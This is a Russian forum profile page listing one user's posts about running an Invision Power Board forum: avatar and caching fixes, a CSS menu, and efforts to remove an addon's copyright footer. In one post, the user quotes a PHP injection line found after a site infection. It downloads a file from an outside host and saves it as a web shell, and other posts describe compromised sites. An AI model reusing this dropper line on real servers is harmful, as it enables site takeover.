Jump to content
View in the app

A better way to browse. Learn more.

IPBMafia.ru - поддержка Invision Community, релизы, темы, плагины и приложения

A full-screen app on your home screen with push notifications, badges and more.

To install this app on iOS and iPadOS
  1. Tap the Share icon in Safari
  2. Scroll the menu and tap Add to Home Screen.
  3. Tap Add in the top-right corner.
To install this app on Android
  1. Tap the 3-dot menu (⋮) in the top-right corner of the browser.
  2. Tap Add to Home screen or Install app.
  3. Confirm by tapping Install.

Pashok(one)

Актив
  • Регистрация

  • В сети

Everything posted by Pashok(one)

  1. Я нашёл сам копирайт в файле /admin/applications_addon/other/ihost/sources/classes/library.php Но не смог его вырезать. так как после того как заливаю обновлённый файл вылезает ошибка в пол экрана. Код копирайта : public function c_acp() { return "<div id='footer' style='margin: 0px; text-align: center;-moz-border-radius:5px;'><a target='_blank' href='__ipbmafia.ru'>" . $this->caches['app_cache']['ihost']['app_title'] . " " . $this->caches['app_cache']['ihost']['app_version'] . "</a> . Локализация от <a target='_blank' href='__ipbmafia.ru' title='IPBMafia.ru - ключ к твоему форуму. Все для IP.Board'>IPBMafia.ru</a></div>"; } public function small_c_acp() { return "<div id='footer_utilities'><p id='copyright' class='right'<a target='_blank' href='__ipbmafia.ru'>" . $this->caches['app_cache']['ihost']['app_title'] . " " . $this->caches['app_cache']['ihost']['app_version'] . "</a> Локализация от <a target='_blank' href='__ipbmafia.ru' title='IPBMafia.ru - ключ к твоему форуму. Все для IP.Board'>IPBMafia.ru</a></p></div>"; }
  2. Не помогает, адрес изображения в шаблонах : Адресс при открытии : __i2.wp.com/*******.ru/forum/public/style_images/WM/profile/default_large.png
  3. Как сменить дефолтную аватрку пользователя, просто замена изображения не помогла.
  4. Я нашёл его! w00t.php ============================================================================== ========================= END =================================== ========================= /forum/index.php?<?error_reporting(0);print(___);copy('__desktop-dja-1.ru/go/greed.txt','q00p.php');die;?> =================================== ============================================================================== А что за файл Thumbs.db в /admin
  5. Надеюсь у тебя всё получилось, помоги мне разобрать файлы cache Содержимое cache : Cодержимое странных файлов : htht.php q00p.php -а этот файл я нге смог открыть произошло вот что : 84331ba7.php
  6. Найдёшь решение напиши мне у меня 3 сайта заражены....
  7. У меня тоже самое!!! на двух сайтах (на трёх) только когда с телефона входишь.
  8. А можно по точней где отключить ? Я отключил в SEO перестроил кэши не помогло... Перестроил FURL кэш всё работает большое тебе спасибо!
  9. Не работает не одна ссылка только посик и главная страница форума , при попытке перейти "к примеру" в тему ошибка :
  10. Скажите где находится шаблон этой самой генерируемой темы.
  11. Я думаю статья по html+css никак не относится к Дизайну/графике , прошу сделать раздел модификация шаблонов.
  12. Ну у нас же нет раздела "Модификации шаблонов" !
  13. Попробуй ещё раз, или бери другой стиль..
  14. Добавляем в globalTemplate : <nav id="menu-wrap"> <ul id="menu"> <li><a href="#">Главная</a></li> <li><a href="#">Категории</a> <ul> <li><a href="#">HTML/CSS</a></li> <li><a href="#">Графика</a></li> <li><a href="#">Разработка</a></li> <li><a href="#">Веб дизайн</a></li> <li><a href="#">IPBMafia.ru</a> <ul> <li><a href="#">Мы лучшие</a></li> </ul> </li> </ul> <li><a href="#">Статьи</a></li> <li><a href="#">О Сайте</a> <ul> <li><a href="#">Пункт</a></li> </ul> </li> <li><a href="#">Контакты</a></li> </ul> </nav> Добавляем в css : /**********Меню от мафии*********/ #menu, #menu ul { margin: 0; padding: 0; list-style: none; } #menu { width: 960px; margin: 60px auto; border: 1px solid #222; background-color: #111; background-image: -moz-linear-gradient(#444, #111); background-image: -webkit-gradient(linear, left top, left bottom, from(#444), to(#111)); background-image: -webkit-linear-gradient(#444, #111); background-image: -o-linear-gradient(#444, #111); background-image: -ms-linear-gradient(#444, #111); background-image: linear-gradient(#444, #111); -moz-border-radius: 6px; -webkit-border-radius: 6px; border-radius: 6px; -moz-box-shadow: 0 1px 1px #777, 0 1px 0 #666 inset; -webkit-box-shadow: 0 1px 1px #777, 0 1px 0 #666 inset; box-shadow: 0 1px 1px #777, 0 1px 0 #666 inset; } #menu:before, #menu:after { content: ""; display: table; } #menu:after { clear: both; } #menu { zoom:1; } #menu li { float: left; border-right: 1px solid #222; box-shadow: 1px 0 0 #444; position: relative; } #menu a { float: left; padding: 12px 30px; color: #999; text-transform: uppercase; font: bold 12px Arial, Helvetica; text-decoration: none; text-shadow: 0 1px 0 #000; } #menu li:hover > a { color: #fafafa; } *html #menu li a:hover { color: #fafafa; } #menu ul { margin: 20px 0 0 0; _margin: 0; /*IE6 only*/ opacity: 0; visibility: hidden; position: absolute; top: 38px; left: 0; z-index: 1; background: #444; background: linear-gradient(#444, #111); box-shadow: 0 -1px 0 rgba(255,255,255,.3); border-radius: 3px; transition: all .2s ease-in-out; } #menu li:hover > ul { opacity: 1; visibility: visible; margin: 0; } #menu ul ul { top: 0; left: 150px; margin: 0 0 0 20px; _margin: 0; box-shadow: -1px 0 0 rgba(255,255,255,.3); } #menu ul li { float: none; display: block; border: 0; _line-height: 0; /*IE6 only*/ box-shadow: 0 1px 0 #111, 0 2px 0 #666; } #menu ul li:last-child { box-shadow: none; } #menu ul a { padding: 10px; width: 130px; _height: 10px; /*IE6 only*/ display: block; white-space: nowrap; float: none; text-transform: none; } #menu ul a:hover { background-color: #0186ba; background-image: linear-gradient(#04acec, #0186ba); } #menu ul li:first-child > a { border-radius: 3px 3px 0 0; } #menu ul li:first-child > a:after { content: ''; position: absolute; left: 40px; top: -6px; border-left: 6px solid transparent; border-right: 6px solid transparent; border-bottom: 6px solid #444; } #menu ul ul li:first-child a:after { left: -6px; top: 50%; margin-top: -6px; border-left: 0; border-bottom: 6px solid transparent; border-top: 6px solid transparent; border-right: 6px solid #3b3b3b; } #menu ul li:first-child a:hover:after { border-bottom-color: #04acec; } #menu ul ul li:first-child a:hover:after { border-right-color: #0299d3; border-bottom-color: transparent; } #menu ul li:last-child > a { border-radius: 0 0 3px 3px; } /**********Меню от мафии********/
  15. Решил герлянды вытащить?
  16. :rofl: Я бы за такое 50 рублей бы не дал....
  17. Пробуй перейти : __Твой_сайт.ru/admin/index.php?adsess=64ffd4267b7f961f3a510e821d4eb4fd&app=members&module=cfields&section=customfields
  18. Настройки > Настройки системы > System > Глобальные настройки. Название сайта : Адрес сайта :
  19. У меня тоже самое только веб шела в admin applications вроде бы нету....
  20. Ладно я удалю. а оно появится таким же методом как и появилось до этого.... Ой както я не подумал у меня права на запись в htacess

Configure browser push notifications

Chrome (Android)
  1. Tap the lock icon next to the address bar.
  2. Tap Permissions → Notifications.
  3. Adjust your preference.
Chrome (Desktop)
  1. Click the padlock icon in the address bar.
  2. Select Site settings.
  3. Find Notifications and adjust your preference.